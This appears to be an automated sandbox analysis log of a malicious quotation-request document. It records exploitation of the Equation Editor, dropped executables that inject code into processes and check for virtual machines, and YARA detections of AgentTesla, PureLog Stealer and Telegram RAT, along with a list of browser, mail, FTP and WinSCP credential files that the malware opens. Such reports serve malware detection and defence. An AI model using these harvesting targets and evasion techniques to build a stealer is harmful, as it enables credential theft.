Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX

Source: REQUEST FOR QUOTATION.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: REQUEST FOR QUOTATION.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: REQUEST FOR QUOTATION.docx.doc	Stream path 'CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: REQUEST FOR QUOTATION.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: REQUEST FOR QUOTATION.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: REQUEST FOR QUOTATION.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: REQUEST FOR QUOTATION.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.dr	Stream path '_1776512715/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.dr	Stream path '_1776512716/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.dr	Stream path '_1776512717/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.dr	Stream path '_1776512718/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.dr	Stream path '_1776512720/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.dr	Stream path '_1776512721/CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.dr	Stream path '_1776512722/CONTENTS' entropy: 7.91598386737 (max. 8.0)

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\html.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\AppData\Roaming\html.exe	Memory allocated: 250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Memory allocated: 2880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Memory allocated: 630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Memory allocated: 7A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Memory allocated: 6590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Memory allocated: 8A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Memory allocated: 9A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Memory allocated: 1D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Memory allocated: 2880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Memory allocated: 930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 2150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 5830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 6830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 6970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 7970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 22F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 380000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 23F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 530000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 58D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 5620000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 68D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 78D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 390000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 23D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: A20000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Roaming\html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Thread delayed: delay time: 922337203685477

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3168	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe TID: 3240	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe TID: 3352	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3556	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3588	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 4048	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3792	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3212	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3012	Thread sleep count: 200 > 30
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3012	Thread sleep count: 100 > 30

Source: C:\Users\user\AppData\Roaming\html.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Roaming\html.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Roaming\html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Thread delayed: delay time: 922337203685477

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_8-487
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_8-451
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_8-510

Source: C:\Users\user\AppData\Roaming\html.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 8_2_036106F7 mov edx, dword ptr fs:[00000030h]

8_2_036106F7

Source: C:\Users\user\AppData\Roaming\html.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\html.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\html.exe	Memory written: C:\Users\user\AppData\Roaming\html.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory written: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory written: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe base: 400000 value starts with: 4D5A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\html.exe "C:\Users\user\AppData\Roaming\html.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process created: C:\Users\user\AppData\Roaming\html.exe "C:\Users\user\AppData\Roaming\html.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"

Source: C:\Users\user\AppData\Roaming\html.exe	Queries volume information: C:\Users\user\AppData\Roaming\html.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Queries volume information: C:\Users\user\AppData\Roaming\html.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Queries volume information: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Queries volume information: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Queries volume information: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Queries volume information: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe VolumeInformation

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: html.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpTrle.exe PID: 3532, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.html.exe.28cf3d0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.4f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.4f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mpTrle.exe.251d10c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mpTrle.exe.251e124.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.2c4d040.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.2c13268.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mpTrle.exe.219f414.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.2c4e058.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mpTrle.exe.219f414.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.28cf3d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mpTrle.exe.24e3334.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.398826908.00000000004F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.399016918.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.421607400.0000000002151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.421607400.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.399016918.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: html.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: html.exe PID: 3296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpTrle.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpTrle.exe PID: 4088, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\html.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\html.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Directory queried: number of queries: 1006

Source: Yara match	File source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.656194441.0000000002407000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.455352786.0000000002340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.656186717.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: html.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: html.exe PID: 3296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpTrle.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpTrle.exe PID: 4088, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE
